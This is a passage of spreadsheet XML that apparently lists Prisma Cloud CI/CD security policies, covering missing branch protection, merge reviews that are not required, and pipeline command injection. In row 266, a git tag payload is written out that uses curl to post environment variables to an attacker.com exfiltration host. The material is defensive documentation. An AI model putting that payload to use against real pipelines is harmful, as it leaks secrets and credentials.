          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>f938aeb0-39fd-423f-ab6f-508f226eaa11</t>
        </is>
      </c>
      <c r="AI258" t="inlineStr"/>
      <c r="AJ258" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK258" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" t="inlineStr"/>
      <c r="B259" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C259" s="2" t="inlineStr"/>
      <c r="D259" t="inlineStr"/>
      <c r="E259" t="inlineStr"/>
      <c r="F259" t="inlineStr"/>
      <c r="G259" t="b">
        <v>1</v>
      </c>
      <c r="H2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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J259" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K259" t="inlineStr">
        <is>
          <t>Merging to default branch with outdated code allowed in GitHub</t>
        </is>
      </c>
      <c r="L259" t="inlineStr"/>
      <c r="M259" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N259" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O259" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P259" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q259" t="inlineStr"/>
      <c r="R259" t="inlineStr"/>
      <c r="S259" t="inlineStr"/>
      <c r="T259" t="b">
        <v>0</v>
      </c>
      <c r="U259" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V259" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W259" t="inlineStr">
        <is>
          <t>Merging branches into the default branch without ensuring they are up-to-date can present a security risk. This is because merging outdated code may result in the omission of the latest patches and updates from the main stream, including critical security fixes. As a result, potential vulnerabilities may remain unresolved, exposing the system to security threats.</t>
        </is>
      </c>
      <c r="X259" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-merge-outdated-code-allowed</t>
        </is>
      </c>
      <c r="Y259" t="inlineStr"/>
      <c r="Z259" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA259" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB259" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC259" t="inlineStr"/>
      <c r="AD259" t="b">
        <v>1</v>
      </c>
      <c r="AE259" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF259" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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9" t="inlineStr">
        <is>
          <t>a38d0b93-e92a-4524-a891-2c95af81186f</t>
        </is>
      </c>
      <c r="AI259" t="inlineStr"/>
      <c r="AJ259" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK259" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" t="inlineStr"/>
      <c r="B260" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C260" s="2" t="inlineStr"/>
      <c r="D260" t="inlineStr"/>
      <c r="E260" t="inlineStr"/>
      <c r="F260" t="inlineStr"/>
      <c r="G260" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J260" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K260" t="inlineStr">
        <is>
          <t>Actively used GitHub repository lacks branch protection rules</t>
        </is>
      </c>
      <c r="L260" t="inlineStr"/>
      <c r="M260" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N260" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O260" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P260" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q260" t="inlineStr"/>
      <c r="R260" t="inlineStr"/>
      <c r="S260" t="inlineStr"/>
      <c r="T260" t="b">
        <v>0</v>
      </c>
      <c r="U260" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V260" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W260" t="inlineStr">
        <is>
          <t>An actively used repository does not have any protected branch settings configured. Protected branch settings are recommended to enforce stronger controls around the conditions that enable pushing code to important branches within a sensitive repo. Protected branch settings define whether collaborators can delete or force pushing to the branch. They also set requirements for any pushes to the branch, such as passing status checks or a linear commit history. Lack of protected branch settings can allow collaborators to inadvertently/intentionally push code, which introduces security risks to production. An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X260" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/active-ghrepo-lacks-bp-rules</t>
        </is>
      </c>
      <c r="Y260" t="inlineStr"/>
      <c r="Z260" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA260" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB260" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC260" t="inlineStr"/>
      <c r="AD260" t="b">
        <v>1</v>
      </c>
      <c r="AE260" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF260" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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0" t="inlineStr">
        <is>
          <t>57690b6f-9b22-4e4d-ba4a-6e4be0b7d3de</t>
        </is>
      </c>
      <c r="AI260" t="inlineStr"/>
      <c r="AJ260" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK260" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" t="inlineStr"/>
      <c r="B261" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C261" s="2" t="inlineStr"/>
      <c r="D261" t="inlineStr"/>
      <c r="E261" t="inlineStr"/>
      <c r="F261" t="inlineStr"/>
      <c r="G261" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J261" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K261" t="inlineStr">
        <is>
          <t>Merge request approvals in GitLab not required for default branch</t>
        </is>
      </c>
      <c r="L261" t="inlineStr"/>
      <c r="M261" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N261" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O261" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P261" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q261" t="inlineStr"/>
      <c r="R261" t="inlineStr"/>
      <c r="S261" t="inlineStr"/>
      <c r="T261" t="b">
        <v>0</v>
      </c>
      <c r="U261" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V261" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W261" t="inlineStr">
        <is>
          <t>Users granted with write permissions on an actively used repository* can push code directly to the default branch without requiring reviews. An attacker who gains control of a user with write permissions can push malicious code to the default branch. This code is likely to flow through the pipeline and be used in production systems. *An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X261" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-merge-request-appr-notrequired-defbranch</t>
        </is>
      </c>
      <c r="Y261" t="inlineStr"/>
      <c r="Z261" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA261" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB261" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC261" t="inlineStr"/>
      <c r="AD261" t="b">
        <v>1</v>
      </c>
      <c r="AE261" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF261" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>9fbedb87-693a-4efa-a5f2-beda393b8588</t>
        </is>
      </c>
      <c r="AI261" t="inlineStr"/>
      <c r="AJ261" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK261" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" t="inlineStr"/>
      <c r="B262" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C262" s="2" t="inlineStr"/>
      <c r="D262" t="inlineStr"/>
      <c r="E262" t="inlineStr"/>
      <c r="F262" t="inlineStr"/>
      <c r="G262" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J262" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K262" t="inlineStr">
        <is>
          <t>Pull request reviews in BitBucket not required before merging code to default branch</t>
        </is>
      </c>
      <c r="L262" t="inlineStr"/>
      <c r="M262" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N262" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O262" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P262" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q262" t="inlineStr"/>
      <c r="R262" t="inlineStr"/>
      <c r="S262" t="inlineStr"/>
      <c r="T262" t="b">
        <v>0</v>
      </c>
      <c r="U262" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V262" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W262" t="inlineStr">
        <is>
          <t>User accounts granted with Write permissions on an actively used repository can directly push code to the default branch, not required for pull request reviews before code is merged. Attackers compromising such a user account can directly push code to the default branch, which is likely to flow through the pipeline and be used in production systems. An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X262" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-pr-review-merge-notrequired</t>
        </is>
      </c>
      <c r="Y262" t="inlineStr"/>
      <c r="Z262" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA262" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB262" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC262" t="inlineStr"/>
      <c r="AD262" t="b">
        <v>1</v>
      </c>
      <c r="AE262" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF262" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>4720540d-7c36-4456-a782-1e0c2be13663</t>
        </is>
      </c>
      <c r="AI262" t="inlineStr"/>
      <c r="AJ262" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK262" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" t="inlineStr"/>
      <c r="B263" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C263" s="2" t="inlineStr"/>
      <c r="D263" t="inlineStr"/>
      <c r="E263" t="inlineStr"/>
      <c r="F263" t="inlineStr"/>
      <c r="G263" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J263" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K263" t="inlineStr">
        <is>
          <t>Actively used BitBucket repository lacks branch protection rules</t>
        </is>
      </c>
      <c r="L263" t="inlineStr"/>
      <c r="M263" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N263" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O263" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P263" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q263" t="inlineStr"/>
      <c r="R263" t="inlineStr"/>
      <c r="S263" t="inlineStr"/>
      <c r="T263" t="b">
        <v>0</v>
      </c>
      <c r="U263" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V263" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W263" t="inlineStr">
        <is>
          <t>An actively used repository does not have any protected branch settings configured. Protected branch settings are recommended to enforce stronger controls around the conditions that enable pushing code to important branches within a sensitive repo. Protected branch settings define whether collaborators can delete or force pushing to the branch. They also set requirements for any pushes to the branch, such as passing status checks or a linear commit history. Lack of protected branch settings can allow collaborators to inadvertently/intentionally push code, which introduces security risks to production. An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X263" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-active-repo-lacks-bp-rules</t>
        </is>
      </c>
      <c r="Y263" t="inlineStr"/>
      <c r="Z263" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA263" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB263" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC263" t="inlineStr"/>
      <c r="AD263" t="b">
        <v>1</v>
      </c>
      <c r="AE263" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF263" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>a622694d-a6fd-436c-ac67-9dd727ff4e92</t>
        </is>
      </c>
      <c r="AI263" t="inlineStr"/>
      <c r="AJ263" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK263" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" t="inlineStr"/>
      <c r="B264" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C264" s="2" t="inlineStr"/>
      <c r="D264" t="inlineStr"/>
      <c r="E264" t="inlineStr"/>
      <c r="F264" t="inlineStr"/>
      <c r="G264" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J264" t="inlineStr">
        <is>
          <t>CI/CD:Input Validation:</t>
        </is>
      </c>
      <c r="K264" t="inlineStr">
        <is>
          <t>Possible command injection detected in GitHub user event</t>
        </is>
      </c>
      <c r="L264" t="inlineStr"/>
      <c r="M264" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N264" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O264" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P264" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q264" t="inlineStr"/>
      <c r="R264" t="inlineStr"/>
      <c r="S264" t="inlineStr"/>
      <c r="T264" t="b">
        <v>0</v>
      </c>
      <c r="U264" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V264" t="inlineStr">
        <is>
          <t>CI/CD:Input Validation:</t>
        </is>
      </c>
      <c r="W264" t="inlineStr">
        <is>
          <t>Prisma Cloud has identified an attempt to carry out a command injection attack. Pipelines are vulnerable to command injection attacks, in which arbitrary commands and scripts are passed through user controlled inputs such as pull request title, commit description etc., which are referenced by the pipeline configuration file and executed in the pipeline job. When a pipeline job runs, the poisoned controlled inputs can be interpreted as code, which is then executed on the runner, enabling remote code execution attacks to take place in order to access stored secrets or to read or modify the source code.</t>
        </is>
      </c>
      <c r="X264" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-poss-cmnd-inj-userevent</t>
        </is>
      </c>
      <c r="Y264" t="inlineStr"/>
      <c r="Z264" t="inlineStr">
        <is>
          <t>{"category":"Input Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA264" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB264" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC264" t="inlineStr"/>
      <c r="AD264" t="b">
        <v>1</v>
      </c>
      <c r="AE264" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF264" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>20c27e7f-c302-4fe1-9186-c31131e95f63</t>
        </is>
      </c>
      <c r="AI264" t="inlineStr"/>
      <c r="AJ264" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK264" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" t="inlineStr"/>
      <c r="B265" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C265" s="2" t="inlineStr"/>
      <c r="D265" t="inlineStr"/>
      <c r="E265" t="inlineStr"/>
      <c r="F265" t="inlineStr"/>
      <c r="G265" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J265" t="inlineStr">
        <is>
          <t>CI/CD:Input Validation:</t>
        </is>
      </c>
      <c r="K265" t="inlineStr">
        <is>
          <t>GitHub Actions pipeline vulnerable to command injection</t>
        </is>
      </c>
      <c r="L265" t="inlineStr"/>
      <c r="M265" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N265" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O265" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P265" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q265" t="inlineStr"/>
      <c r="R265" t="inlineStr"/>
      <c r="S265" t="inlineStr"/>
      <c r="T265" t="b">
        <v>0</v>
      </c>
      <c r="U265" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V265" t="inlineStr">
        <is>
          <t>CI/CD:Input Validation:</t>
        </is>
      </c>
      <c r="W265" t="inlineStr">
        <is>
          <t>Pipelines are vulnerable to command injection attacks, in which arbitrary commands and scripts are passed through user controlled inputs such as pull request title, commit description etc., which are referenced by the pipeline configuration file and executed in the pipeline job. When a pipeline job runs, the poisoned controlled inputs can be interpreted as code, which is then executed on the runner, enabling remote code execution attacks to take place in order to access stored secrets or to read or modify the source code.</t>
        </is>
      </c>
      <c r="X265" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghaction-vuln-cmnd-inj</t>
        </is>
      </c>
      <c r="Y265" t="inlineStr"/>
      <c r="Z265" t="inlineStr">
        <is>
          <t>{"category":"Input Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA265" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB265" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC265" t="inlineStr"/>
      <c r="AD265" t="b">
        <v>1</v>
      </c>
      <c r="AE265" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF265" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>d3ccb3c1-8e87-47aa-8d59-5ab5deb6cfb6</t>
        </is>
      </c>
      <c r="AI265" t="inlineStr"/>
      <c r="AJ265" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK265" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" t="inlineStr"/>
      <c r="B266" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C266" s="2" t="inlineStr"/>
      <c r="D266" t="inlineStr"/>
      <c r="E266" t="inlineStr"/>
      <c r="F266" t="inlineStr"/>
      <c r="G266" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J266" t="inlineStr">
        <is>
          <t>CI/CD:Input Validation:</t>
        </is>
      </c>
      <c r="K266" t="inlineStr">
        <is>
          <t>CirceCI pipeline vulnerable to command injection</t>
        </is>
      </c>
      <c r="L266" t="inlineStr"/>
      <c r="M266" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N266" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O266" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P266" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q266" t="inlineStr"/>
      <c r="R266" t="inlineStr"/>
      <c r="S266" t="inlineStr"/>
      <c r="T266" t="b">
        <v>0</v>
      </c>
      <c r="U266" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V266" t="inlineStr">
        <is>
          <t>CI/CD:Input Validation:</t>
        </is>
      </c>
      <c r="W266" t="inlineStr">
        <is>
          <t>Pipelines are vulnerable to command injection attacks, in which arbitrary commands and scripts are passed through user controlled inputs such as pull request title, commit description etc., and are then referenced by the pipeline configuration file and executed in the pipeline job. When the pipeline job runs, the poisoned controlled inputs can be interpreted as code and executed on the runner, enabling remote code execution attacks to take place. This will allow the attacker to access stored secrets or to read or modify the source code. For example, the following code snippet is designed to print the associated git tag: steps: &amp;nbsp;&amp;nbsp;- run: echo &gt; Attackers can inject their own commands by creating the git tag value: `curl -X POST -d $(env) https://attacker.com/exfiltrate` After the pipeline is triggered, this string will be evaluated and executed in the context of the pipeline. As a result, the environment variables are sent to the attackers server.</t>
        </is>
      </c>
      <c r="X266" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-vulnerable-cmnd-injection</t>
        </is>
      </c>
      <c r="Y266" t="inlineStr"/>
      <c r="Z266" t="inlineStr">
        <is>
          <t>{"category":"Input Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA266" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB266" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC266" t="inlineStr"/>
      <c r="AD266" t="b">
        <v>1</v>
      </c>
      <c r="AE266" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF266" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>86219273-ec96-4598-8011-fbf6821e022d</t>
        </is>
      </c>
      <c r="AI266" t="inlineStr"/>
      <c r="AJ266" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK266" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" t="inlineStr"/>
      <c r="B267" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C267" s="2" t="inlineStr"/>
      <c r="D267" t="inlineStr"/>
      <c r="E267" t="inlineStr"/>
      <c r="F267" t="inlineStr"/>
      <c r="G267" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J267" t="inlineStr">
        <is>
          <t>CI/CD:Input Validation:</t>
        </is>
      </c>
      <c r="K267" t="inlineStr">
        <is>
          <t>GitHub Actions workflow allows command execution through the standard output stream</t>
        </is>
      </c>
      <c r="L267" t="inlineStr"/>
      <c r="M267" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N267" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O267" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P267" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q267" t="inlineStr"/>
      <c r="R267" t="inlineStr"/>
      <c r="S267" t="inlineStr"/>
      <c r="T267" t="b">
        <v>0</v>
      </c>
      <c r="U267" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V267" t="inlineStr">
        <is>
          <t>CI/CD:Input Validation:</t>
        </is>
      </c>
      <c r="W267" t="inlineStr">
        <is>
          <t>The ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable is set to 'True' in the GitHub Actions workflow. This setting, which was deprecated by GitHub, allows the workflow to evaluate the set-env and add-path commands once they have been written to the standard output stream. This can lead to command execution in the workflow. For example, a workflow that prints the title of new GitHub issues to the standard output stream, would allow an attacker to create a GitHub issue with a malicious title that would be evaluated by the workflow. Note: although this setting was deprecated by GitHub, it is still functional. For more information see: https://github.com/actions/toolkit/security/advisories/GHSA-mfwh-5m23-j46w</t>
        </is>
      </c>
      <c r="X267" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gha-workflow-allows-cmnd-exe</t>
        </is>
      </c>
      <c r="Y267" t="inlineStr"/>
      <c r="Z267" t="inlineStr">
        <is>
          <t>{"category":"Input Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA267" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB267" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC267" t="inlineStr"/>
      <c r="AD267" t="b">
        <v>1</v>
      </c>
      <c r="AE267" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF267" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>4d15bf13-2da4-4353-aeac-8c2f8891f061</t>
        </is>
      </c>
      <c r="AI267" t="inlineStr"/>
      <c r="AJ267" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK267" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" t="inlineStr"/>
      <c r="B268" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C268" s="2" t="inlineStr"/>
      <c r="D268" t="inlineStr"/>
      <c r="E268" t="inlineStr"/>
      <c r="F268" t="inlineStr"/>
      <c r="G268" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J268" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline Flow Control:</t>
        </is>
      </c>
      <c r="K268" t="inlineStr">
        <is>
          <t>Pull request reviews are not required in Azure Repos before merging to the default branch</t>
        </is>
      </c>
      <c r="L268" t="inlineStr"/>
      <c r="M268" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N268" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O268" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P268" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q268" t="inlineStr"/>
